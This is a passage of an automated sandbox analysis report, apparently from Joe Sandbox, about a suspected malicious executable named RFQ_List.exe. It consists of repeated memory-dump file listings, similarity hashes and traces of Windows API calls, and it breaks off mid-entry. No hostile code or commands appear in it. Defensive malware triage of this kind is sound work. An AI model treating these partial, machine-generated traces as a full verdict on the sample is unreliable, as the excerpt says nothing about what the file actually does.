                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                  • String ID:
                  • API String ID: 2547128583-0
                  • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                  • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                  • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                  • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                  APIs
                  • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                  • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Window$EnableShow
                  • String ID:
                  • API String ID: 1136574915-0
                  • Opcode ID: e1b0357d7dd7ae1d86e72c14d3f4c1d25802a01c5ec69123f4cd8e600442627b
                  • Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
                  • Opcode Fuzzy Hash: e1b0357d7dd7ae1d86e72c14d3f4c1d25802a01c5ec69123f4cd8e600442627b
                  • Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D
                  APIs
                  • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RFQ_List.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: File$AttributesCreate
                  • String ID:
                  • API String ID: 415043291-0
                  • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                  • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                  • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                  • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,?,0040580A,?,?,00000000,004059E0,?,?,?,?), ref: 00405C0A
                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C1E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                  • Instruction ID: 468109bf43167ec42dafbdb034993651ba0ea03f7208bcc181294849b19367e8
                  • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                  • Instruction Fuzzy Hash: 22D0C972504520ABC6102728EE0889BBB95EB542717024B35FAA9A22B0CB304C568A98
                  APIs
                  • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                  • GetLastError.KERNEL32 ref: 00405714
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CreateDirectoryErrorLast
                  • String ID:
                  • API String ID: 1375471231-0
                  • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                  • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                  • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                  • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                  APIs
                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: PrivateProfileStringWrite
                  • String ID:
                  • API String ID: 390214022-0
                  • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                  • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                  • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                  • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                  APIs
                  • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                  • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                  • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                  • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                  APIs
                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                  • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
                  • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                  • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                  APIs
                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                  • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                  • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                  • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                  APIs
                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: PrivateProfileString
                  • String ID:
                  • API String ID: 1096422788-0
                  • Opcode ID: a460f5096a27a9807c6c692807f1a38f1d021b0c20a1ed485e054663b51cb092
                  • Instruction ID: df176f915953132b0bb271560c482e71de85830ffa73b9ff1be2ff384974574c
                  • Opcode Fuzzy Hash: a460f5096a27a9807c6c692807f1a38f1d021b0c20a1ed485e054663b51cb092
                  • Instruction Fuzzy Hash: 4AE04F30800208BBDF01AFA4CE49DBD3B79AF00344F14043AF940AB0D5E7F89A819749
                  APIs
                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 6856b2a6853cfed7dbe1fff2f5d824482863d63baf729e56f82695697e155cc2
                  • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
                  • Opcode Fuzzy Hash: 6856b2a6853cfed7dbe1fff2f5d824482863d63baf729e56f82695697e155cc2
                  • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                  APIs
                  • SendMessageW.USER32(0001042C,00000000,00000000,00000000), ref: 00404177
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 3bba03b2e652c4a11e25962405d633cc82753624cff89e0bc5c9eed7d7d36a99
                  • Instruction ID: 76ab245bb7d1846facc95ba49394d78ca693920881c876aece34d531b1437416
                  • Opcode Fuzzy Hash: 3bba03b2e652c4a11e25962405d633cc82753624cff89e0bc5c9eed7d7d36a99
                  • Instruction Fuzzy Hash: 9EC09B717407007FDA118F60AD49F1777646B54741F1484397340F50E0C774E450D61C
                  APIs
                  • SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                  • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                  • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                  • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                  APIs
                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: FilePointer
                  • String ID:
                  • API String ID: 973152223-0
                  • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                  • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                  • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                  • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                  APIs
                  • GetDlgItem.USER32(?,00000403), ref: 00405351
                  • GetDlgItem.USER32(?,000003EE), ref: 00405360
                  • GetClientRect.USER32(?,?), ref: 0040539D
                  • GetSystemMetrics.USER32(00000002), ref: 004053A4
                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                  • ShowWindow.USER32(?,00000008), ref: 00405440
                  • GetDlgItem.USER32(?,000003EC), ref: 00405461
                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                  • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                    • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                  • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                  • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                  • CloseHandle.KERNEL32(00000000), ref: 004054C8
                  • ShowWindow.USER32(00000000), ref: 004054EC
                  • ShowWindow.USER32(00000000,00000008), ref: 004054F1
                  • ShowWindow.USER32(00000008), ref: 0040553B
                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                  • CreatePopupMenu.USER32 ref: 00405580
                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                  • GetWindowRect.USER32(?,?), ref: 004055B4
                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                  • OpenClipboard.USER32(00000000), ref: 00405615
                  • EmptyClipboard.USER32 ref: 0040561B
                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                  • GlobalLock.KERNEL32(00000000), ref: 00405631
                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                  • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                  • CloseClipboard.USER32 ref: 00405676
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
